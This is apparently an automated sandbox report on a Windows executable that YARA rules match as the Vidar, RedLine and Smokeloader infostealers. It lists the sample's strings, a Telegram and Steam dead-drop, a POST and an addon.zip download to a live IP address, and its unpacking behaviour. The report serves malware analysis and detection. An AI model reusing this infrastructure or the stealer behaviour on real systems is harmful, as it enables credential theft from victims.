Source: 06625899.exe, 00000000.00000002.423731237.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 50764714324176067669882221.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/V
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbot
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbotC
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/looking_glassbotJ
Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: t.me

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00414330 StrCmpCA,GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00414330

Source: global traffic	HTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
Source: global traffic	HTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2

Source: 06625899.exe, 00000000.00000002.412477321.000000000082A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Source: 06625899.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00428C70	0_2_00428C70
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043C00E	0_2_0043C00E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004051A0	0_2_004051A0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042B366	0_2_0042B366
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A379	0_2_0042A379
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043C55F	0_2_0043C55F
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A80E	0_2_0042A80E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426810	0_2_00426810
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426838	0_2_00426838
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043BABD	0_2_0043BABD
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042ABAC	0_2_0042ABAC
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00405C40	0_2_00405C40
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00405C68	0_2_00405C68
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043DC7F	0_2_0043DC7F
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00407C20	0_2_00407C20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043CC3B	0_2_0043CC3B
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00407C9E	0_2_00407C9E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042CDD0	0_2_0042CDD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00406E10	0_2_00406E10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00426EB0	0_2_00426EB0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042AF7E	0_2_0042AF7E

Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 0042BD10 appears 116 times
Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 004014E0 appears 540 times
Source: C:\Users\user\Desktop\06625899.exe	Code function: String function: 00433750 appears 44 times

Source: 06625899.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 06625899.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\06625899.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/4@1/3

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_0041F170

Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 36067264576515806059430256.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F040 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle,

0_2_0041F040

Source: C:\Users\user\Desktop\06625899.exe	Command line argument: The	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Greal	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: (Llangollen)	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: was	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: 19th-century	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Welsh-language	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: periodical	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: first	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: published	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: William	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Williams	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Llangollen	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: 1852	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Ebenezer	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: was	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Independent	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: chapel	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Inkerman	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Street	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Llanelli	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Carmarthenshire	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Wales	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940

Source: C:\Users\user\Desktop\06625899.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 06625899.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source:	Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042C254 pushad ; retn 0042h	0_2_0042C255
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00433795 push ecx; ret	0_2_004337A8
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042ECB5 push ecx; ret	0_2_0042ECC8

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,